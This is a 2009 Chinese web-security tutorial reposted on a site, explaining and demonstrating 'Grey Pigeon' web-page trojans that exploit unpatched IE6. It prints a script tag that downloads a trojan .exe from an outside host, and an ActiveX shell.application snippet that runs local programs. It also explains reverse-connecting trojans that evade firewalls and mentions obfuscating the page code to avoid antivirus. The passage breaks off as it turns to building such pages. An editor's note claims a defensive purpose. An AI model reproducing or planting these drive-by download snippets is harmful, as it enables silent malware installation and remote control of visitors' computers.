当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > “灰鸽子”网页木马从原理、制作到防范

安全基础
网络协议分析软件的编写
一个SYN攻击的源程序
彻底清查带毒的Cookie
解析cookie欺骗实现过程及具体应用
从芯认识 浅谈宽带路由器处理芯片
搜索引擎也另类 想搜啥就搜啥
命令提示符恢复本地安全策略小技巧
根据PID查杀木马病毒的适用小方法
网络管理员日志之硬件修理篇
著名黑客Kevin Mitnick谈网络安全
Windows XP 常见的进程列表
网络攻击概览
爱机中毒自救六招
引起网络广播风暴的几种原因
黑客入侵36计
局域网测试及故障排除经验谈
不可忽视的BIOS参数设置
微软IE浏览器非常规修改全攻略(上)
微软IE浏览器非常规修改全攻略(下)
网管十招

安全基础 中的 “灰鸽子”网页木马从原理、制作到防范


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 109 ::
收藏到网摘: n/a

编者按:事物都有两面性。本文介绍的网页木马制作技巧,意在加强大家的防范意识,而不是想“荼毒生灵”。希望能给大家带来一些帮助,营造一个安全的上网环境。

  如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

  以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理

  首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。

  有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

 ⒈自动下载程序

  <SCRIPT LANGUAGE="icyfoxlovelace" src="http://go163go.vicp.net/1.exe"></SCRIPT>

  小提示:代码说明

  a. 代码中“src”的属性为程序的网络地址,本例中“http://go163go.vicp.net/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。

  b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。

  把这段代码插入到网页源代码的</BODY>…</BODY>之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录<Temporary Internet Files>,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。

图1 网页木马示例

  小提示:灰鸽子木马

  为什么一定要用灰鸽子木马呢?因为灰鸽子是反弹型木马,该木马能绕过天网等大多数防火墙的拦截,中马后,服务端即被控端能主动连接控制端(客户端),也就是说,一旦被控端连接到Internet,在控制端那里,被控端就会“自动上线”(如图2)。

图2 灰鸽子控制短示例(汗!又一大毒枭:))

  ⒉自动运行程序

  <SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application"); shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); </SCRIPT>

  把这段代码插入到网页源代码的</BODY>…</BODY>之间,然后用IE打开该网页,你会发现,这段代码可以在没有打相关补丁的IE6中自动打开记事本。

  这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,可以用它自动运行本地电脑上的任意程序。

  通过以上的代码我们可以看出,利用IE的漏洞,也就是说在网页中插入适当的代码,IE完全可以自动下载和运行程序,不过,IE一旦打了相关补丁,这些代码就会失去作用。另外,这些代码要运行和下载程序,有些杀毒软件的网页监控会视它们为病毒,为了逃避追杀,黑客可能会使用一些工具对网页的源代码进行加密处理(如图3)。

图3 加密后的网页代码

二、网页木马的基本用法

  理解了网页木马攻击的原理,我们可以制作自